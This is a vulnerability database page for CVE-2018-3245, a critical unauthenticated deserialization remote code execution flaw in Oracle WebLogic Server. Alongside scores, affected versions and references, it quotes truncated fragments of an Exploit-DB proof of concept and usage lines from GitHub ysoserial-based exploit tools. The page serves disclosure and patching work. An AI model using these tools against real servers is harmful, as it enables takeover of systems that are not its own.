Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9.8
CVSSv3

CVE-2018-3245

Published: 17/10/2018 Updated: 03/10/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 756
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Subscribe to Oracle

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 12.1.3.0.0

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.2.1.3.0

Exploits

Exploit DB: Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team // URL: blogsprojectmoonpw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/ package ysoserialpayloads; import comsunjndirmiregistryReferenceWrapper_Stub; import sunrmiserverUnicastRef; import sunrmitransportLiveRef; import sunrmitransporttcpTC ...

Github Repositories

https://github.com/jas502n/CVE-2018-3245

CVE-2018-3245

Weblogic-CVE-2018-3245 CVE-2018-3245 0x00 简介 当地时间10月16日,北京时间10月17日凌晨,Oracle官方发布了10月份(第三季度)关键补丁更新CPU(Critical Patch Update), 其中修复了一个7月份(第二季度)CPU补丁中未能完全修复的(CVE-2018-2893)Weblogic远程代码执行漏洞,此次新修复的漏洞编号为CVE-2018-324

https://github.com/ianxtianxt/CVE-2018-3245

CVE-2018-3245

CVE-2018-3245 Step 1 java -jar ysoserial-cve-2018-3245jar WHY SO SERIAL? Usage: java -jar ysoserial-cve-2018-3245jar [payload] '[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ CVE_2018_2893_1 @mbechler CVE_2018_2893_2 @mbechler CVE_2018_2893_3 @mbechler CVE_2018_3245 @m

https://github.com/pyn3rd/CVE-2018-3245

CVE-2018-3245-PoC

CVE-2018-3245 Step 1 java -jar ysoserial-cve-2018-3245jar Usage: java -jar ysoserial-cve-2018-3245jar [payload] '[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ CVE_2018_2893_1 @mbechler CVE_2018_2893_2 @mbechler CVE_2018_2893_3 @mbechler CVE_2018_3245 @mbechler JR

References

CWE-502http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.htmlhttp://www.securitytracker.com/id/1041896http://www.securityfocus.com/bid/105613https://www.exploit-db.com/exploits/46513/https://nvd.nist.govhttps://github.com/jas502n/CVE-2018-3245https://www.exploit-db.com/exploits/46513
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2022-38028CVE-2024-32406CVE-2024-25624IMAPCVE-2024-2310CVE-2024-0874CVE-2024-20359XXEremote code execution
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook